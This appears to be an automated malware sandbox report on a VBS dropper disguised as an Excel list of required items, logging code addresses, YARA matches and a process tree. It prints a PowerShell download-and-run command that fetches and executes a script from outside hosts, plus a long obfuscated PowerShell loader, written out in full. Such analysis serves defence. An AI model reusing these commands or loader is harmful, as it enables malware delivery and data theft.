                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 16_2_04D9E36016_2_04D9E360
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A29250D25_3_0000020D0A29250D
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A295E9425_3_0000020D0A295E94
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A29559425_3_0000020D0A295594
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A29591425_3_0000020D0A295914
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A294A5025_3_0000020D0A294A50
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A292C5225_3_0000020D0A292C52
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A291BBC25_3_0000020D0A291BBC
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_0000020D0A2927B225_3_0000020D0A2927B2
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A908CC25_3_00007DF415A908CC
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A7286C25_3_00007DF415A7286C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AAD42C25_3_00007DF415AAD42C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B1A3C825_3_00007DF415B1A3C8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B523D825_3_00007DF415B523D8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AE13BC25_3_00007DF415AE13BC
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AF071C25_3_00007DF415AF071C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5D75C25_3_00007DF415B5D75C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5E5F425_3_00007DF415B5E5F4
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AC564025_3_00007DF415AC5640
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5757825_3_00007DF415B57578
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B6A59825_3_00007DF415B6A598
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A910BC25_3_00007DF415A910BC
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5E0B025_3_00007DF415B5E0B0
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A7105825_3_00007DF415A71058
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A75F9C25_3_00007DF415A75F9C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415ACFF7825_3_00007DF415ACFF78
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AC52F425_3_00007DF415AC52F4
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B632F825_3_00007DF415B632F8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415ADD2A025_3_00007DF415ADD2A0
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AED24825_3_00007DF415AED248
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A821F025_3_00007DF415A821F0
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5A19C25_3_00007DF415B5A19C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415ACECF825_3_00007DF415ACECF8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415ADCD3825_3_00007DF415ADCD38
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415ACCC8425_3_00007DF415ACCC84
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AC3CE825_3_00007DF415AC3CE8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5DC9425_3_00007DF415B5DC94
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5BC6825_3_00007DF415B5BC68
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B4DBC825_3_00007DF415B4DBC8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AC6BE425_3_00007DF415AC6BE4
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A9CBE825_3_00007DF415A9CBE8
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A90EF425_3_00007DF415A90EF4
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B6DF6C25_3_00007DF415B6DF6C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415ADCE4825_3_00007DF415ADCE48
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A8E97025_3_00007DF415A8E970
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AC395C25_3_00007DF415AC395C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AE582425_3_00007DF415AE5824
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5E77425_3_00007DF415B5E774
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AB8B2825_3_00007DF415AB8B28
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415ADCB5C25_3_00007DF415ADCB5C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B5EB0C25_3_00007DF415B5EB0C
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B6AAB425_3_00007DF415B6AAB4
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A87AE025_3_00007DF415A87AE0
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415AD0AD425_3_00007DF415AD0AD4
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415B119B425_3_00007DF415B119B4
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A7F9C025_3_00007DF415A7F9C0
                        Source: C:\Windows\System32\svchost.exeCode function: 25_2_0000020D09DC0C7025_2_0000020D09DC0C70
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_3_00007DF4DF3A4EFC32_3_00007DF4DF3A4EFC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_3_00007DF4DF3A220432_3_00007DF4DF3A2204
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_3_00007DF4DF3A392C32_3_00007DF4DF3A392C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446541262C32_2_000002446541262C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446541C2D032_2_000002446541C2D0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542321832_2_0000024465423218
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542D73032_2_000002446542D730
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544474432_2_0000024465444744
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542C5D832_2_000002446542C5D8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465438E8832_2_0000024465438E88
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544669C32_2_000002446544669C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465437E5832_2_0000024465437E58
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542CE7032_2_000002446542CE70
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446543467832_2_0000024465434678
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446545011432_2_0000024465450114
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00000244654460EC32_2_00000244654460EC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544F9A432_2_000002446544F9A4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544F15832_2_000002446544F158
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446543E02832_2_000002446543E028
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465425FCC32_2_0000024465425FCC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544AFF032_2_000002446544AFF0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446543089832_2_0000024465430898
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00000244654450A432_2_00000244654450A4
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446545104832_2_0000024465451048
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446543786832_2_0000024465437868
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544420C32_2_000002446544420C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446545422132_2_0000024465454221
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544522432_2_0000024465445224
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542723432_2_0000024465427234
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542EABC32_2_000002446542EABC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465450A4432_2_0000024465450A44
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542FD3C32_2_000002446542FD3C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00000244654114D032_2_00000244654114D0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00000244654374EC32_2_00000244654374EC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465445D8432_2_0000024465445D84
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465449DA832_2_0000024465449DA8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00000244654455BC32_2_00000244654455BC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446545156432_2_0000024465451564
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542758032_2_0000024465427580
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465456C0832_2_0000024465456C08
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446542E40432_2_000002446542E404
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544D3C832_2_000002446544D3C8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_000002446544F4B832_2_000002446544F4B8
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_0000024465440C4C32_2_0000024465440C4C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3C0E7432_2_00007DF4DF3C0E74
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3C728D32_2_00007DF4DF3C728D
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3C330832_2_00007DF4DF3C3308
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3C01A032_2_00007DF4DF3C01A0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3BF8E032_2_00007DF4DF3BF8E0
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3C9C7432_2_00007DF4DF3C9C74
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3C152C32_2_00007DF4DF3C152C
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3C27AC32_2_00007DF4DF3C27AC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3BF04832_2_00007DF4DF3BF048
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3E848032_2_00007DF4DF3E8480
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3E8FDC32_2_00007DF4DF3E8FDC
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3E720032_2_00007DF4DF3E7200
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF3E9C1832_2_00007DF4DF3E9C18
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeCode function: 32_2_00007DF4DF4022CC32_2_00007DF4DF4022CC
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4296
                        Source: unknownProcess created: Commandline size = 4296
                        Source: C:\Windows\System32\wscript.exeProcess created: Commandline size = 4296Jump to behavior
                        Source: amsi32_7832.amsi.csv, type: OTHERMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7352, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: Process Memory Space: powershell.exe PID: 7832, type: MEMORYSTRMatched rule: INDICATOR_SUSPICIOUS_PWSH_B64Encoded_Concatenated_FileEXEC author = ditekSHen, description = Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution
                        Source: classification engineClassification label: mal100.troj.spyw.expl.evad.winVBS@51/124@15/17
                        Source: C:\Windows\System32\svchost.exeCode function: 25_3_00007DF415A7286C CreateToolhelp32Snapshot,Thread32First,Thread32Next,CloseHandle,SuspendThread,25_3_00007DF415A7286C
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\Public\grm2bfvsa42.vbsJump to behavior
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeMutant created: NULL
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7840:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:6528:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7228:120:WilError_03
                        Source: C:\Windows\System32\conhost.exeMutant created: \Sessions\1\BaseNamedObjects\Local\SM0:7360:120:WilError_03
                        Source: C:\Windows\SysWOW64\svchost.exeMutant created: \Sessions\1\BaseNamedObjects\MSCTF.Asm.{00000009-4b44c99e-e2eb-c0a4be-89a68ae4061c}
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile created: C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_yq0lud3i.flo.ps1Jump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs"
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7352
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeWMI Queries: IWbemServices::ExecQuery - root\cimv2 : select * from win32_process where ProcessId=7832
                        Source: C:\Windows\System32\wscript.exeFile read: C:\Users\user\Desktop\desktop.iniJump to behavior
                        Source: C:\Windows\System32\wscript.exeKey opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiersJump to behavior
                        Source: unknownProcess created: C:\Windows\System32\wscript.exe C:\Windows\System32\WScript.exe "C:\Users\user\Desktop\List of Required items xlsx.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\wscript.exe "C:\Windows\System32\WScript.exe" "C:\Users\Public\grm2bfvsa42.vbs"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\wbem\WMIC.exe wmic diskdrive get caption,serialnumber
                        Source: C:\Windows\System32\wbem\WMIC.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: unknownProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" ";$Kollationernendkaldebefjelses='Elefantridderne';;$Flumed='Rundingernes';;$Metropoler='Larceners';;$Provisionsindtgters='Drivremmen';;$Smedejernslaage=$host.Name;function Elevtimens($Ballongynges){If ($Smedejernslaage) {$Firspandets79=2} for ($Kollationerne=$Firspandets79;;$Kollationerne+=3){if(!$Ballongynges[$Kollationerne]) { break };$Bibliofil+=$Ballongynges[$Kollationerne];$Squibbery='Jogurternes'}$Bibliofil}function Fortynderes($Thuds){ .($Nongame) ($Thuds)}$Fangled=Elevtimens 'ToN rePltSi.Dew';$Fangled+=Elevtimens 'S E.ubC,c oLR.i HEStNs T';$Gasted=Elevtimens 'S.MAnoBazObiP l lAhaMe/';$Dealation=Elevtimens 'coTValSlsEj1Pl2';$Hiwire='St[LuNF,e.dtL . sCee SR Iv,lIRoc .eHyp .O ,iUnnRyTFrm.ia n maUdg oeMir L]Va:Ch:RaS Te Tc Su R AiPrt yMiPSpR fOinT PoAacN,ORkLNa= ,$ VDbeeAgA.uL ZaInTFlI.po AN';$Gasted+=Elevtimens 'An5 T.Co0 a(FuWWiigen KdBao ,wKosHo MaNReTU T1Fe0He.Da0 i;O TrW eiHenU 6 4J ;Fa ,mxSn6 o4Fi;B DrNivFy:Um1.e3Fo1U .,t0 ,)Se BeGNoeHjc,ok loEt/ H2I 0,n1Im0.v0Du1Ri0 P1Pr .kFj,iS,rSteDef,noVrxSk/Af1Ud3Ru1To.Ve0';$Endomysial=Elevtimens ',nuAsSHaE,kRRe-BiaOuGBaE n AT';$niveauoplysning=Elevtimens ' h StAnt bpTes T: h/Kh/UnpRatRas y.A gNor lo ,u Ap o/U aAlb ./P L aaInnBreHvyNo.Fod KsVap.r>CohEmt .tN.p,asK :R / / nwSmw uwFa.YapSkuRenHoeBae ut B. aaPee.n/AraCobS,/ LT,arenSpeC yO.. td oskrp';$Afpolitiserendes=Elevtimens ',a>';$Nongame=Elevtimens 'RuIK,enoX';$Stripperne='Bystyrers';$Assumptiveness='\Nonfattening.Ret';Fortynderes (Elevtimens ' P$UnGSelL.o BE,AFllH : ,F No Pr SS ,DNoeNo=Co$DiER NLiVLy: ABoP lPP D PA .t a M+sa$Baa ,SDosCaU uM pUdTMeiViV tESuN e DS.uS');Fortynderes (Elevtimens 'Ex$ kgMalUnOBab,eA LGr:K BRuIPrbTue Kh.wo ,lroDFle MLBuS ueS,n vSAb=,y$Ovn SIS vFoeTiAAcU TospPViLInYPlSKvnUniKoN LG .MesS PGrLAlIVat S(Af$PrAUnf ePNyO LPoISetB iRrS.pED R rE yNMudPrETvSMa)');Fortynderes (Elevtimens $Hiwire);$niveauoplysning=$Bibeholdelsens[0];$heda=(Elevtimens ' a$MagLalgaOPrBR,ARuLA :MysKotulr aM smNoeOk=Inn aE uW S-UnODiB ,J eFoc ItPu R SG Y oSF TL.eD MBl.re$SufMbAInn KgDelPae id');Fortynderes ($heda);Fortynderes (Elevtimens 'Fo$E S StubrLem im UeCu. HSleToaPad.neSkrPasHa[N $P EShnGtd Ao fm cySes riBaaPrlbo]Tr=Un$AlG FaLus tAne Cd');$Preposed=Elevtimens ' O$AfSP,tTyrp.mHem.oe,n.SnDAcoCrwGrn Ol LoCoaMyd aFO iStlSteTi(As$ On niPrvRue a TuMuoC,pSul kySasFanK iManRogko,P,$InHMajgaewarben neMirBjsRe)';$Hjerners=$Forsde;Fortynderes (Elevtimens ' .$,nGtiL o.oBBlA ll s:HaDEar,eiO,KTeKroeDiV .aChrAle fR SN.ie esPa=Hi( et ,EMesS T K-PePAla EtDahSi An$BehlgjGgeOvRUnnLeE rrSksHa)');while (!$Drikkevarernes) {Fortynderes (Elevtimens ' t$ gBelIno b aIrlHj: LPOmrV oU.tEneGes ptUns,lyp r F=,u$ ,A on stMyi Sc waY p,li St a hl SiSusmit aiAnc') ;Fortynderes $Preposed;Fortynderes (Elevtimens ' oSH,t PaS rHaTSo-E sRelEnE.ieMupCh M4');Fortynderes (Elevtimens ' I$PrGInlSeO NBBlASkLDe:Vedi RS IRdKT.kViES vMiaKl
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXE "C:\Program Files (x86)\Microsoft Office\Root\Office16\EXCEL.EXE" "C:\Users\Public\ilurgw960k7fwnm.xlsx"
                        Source: unknownProcess created: C:\Windows\System32\svchost.exe C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS
                        Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\msiexec.exe "C:\Windows\SysWOW64\msiexec.exe"
                        Source: C:\Windows\SysWOW64\msiexec.exeProcess created: C:\Windows\SysWOW64\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\SysWOW64\svchost.exeProcess created: C:\Windows\System32\svchost.exe "C:\Windows\System32\svchost.exe"
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr65F9.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/20442955"
                        Source: C:\Program Files\Google\Chrome\Application\chrome.exeProcess created: C:\Program Files\Google\Chrome\Application\chrome.exe "C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2440 --field-trial-handle=2240,i,1470549389537924356,18333777287328738215,262144 /prefetch:8
                        Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEProcess created: C:\Windows\splwow64.exe C:\Windows\splwow64.exe 8192
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe --user-data-dir="C:\Users\user\AppData\Local\Temp\chr6EA4.tmp" --explicitly-allowed-ports=8000 --disable-gpu --new-window "http://127.0.0.1:8000/22a686d4/a1d56f56"
                        Source: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exeProcess created: C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-GB --service-sandbox-type=none --mojo-platform-channel-handle=2860 --field-trial-handle=2864,i,15536600320984337439,5913391626331834,262144 /prefetch:3
                        Source: C:\Windows\System32\svchost.exeProcess created: C:\Program Files\Windows Media Player\wmpnscfg.exe "C:\Program Files\Windows Media Player\wmpnscfg.exe"
                        Source: C:\Program Files\Windows Media Player\wmpnscfg.exeProcess created: C:\Windows\System32\dllhost.exe "C:\Windows\system32\dllhost.exe"
                        Source: C:\Windows\System32\wscript.exeProcess created: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command function DownloadAndRun([string]$url, [string]$destination) { Invoke-WebRequest -Uri $url -OutFile $destination ; Start-Process -FilePath $destination -Wait };DownloadAndRun -url 'https://www.pts.group/ab/ab.vbs' -destination 'C:\Users\Public\grm2bfvsa42.vbs';DownloadAndRun -url 'https://www.fornid.com/ab/List%20of%20required%20items.xlsx' -destination 'C:\Users\Public\ilurgw960k7fwnm.xlsx'Jump to behavior
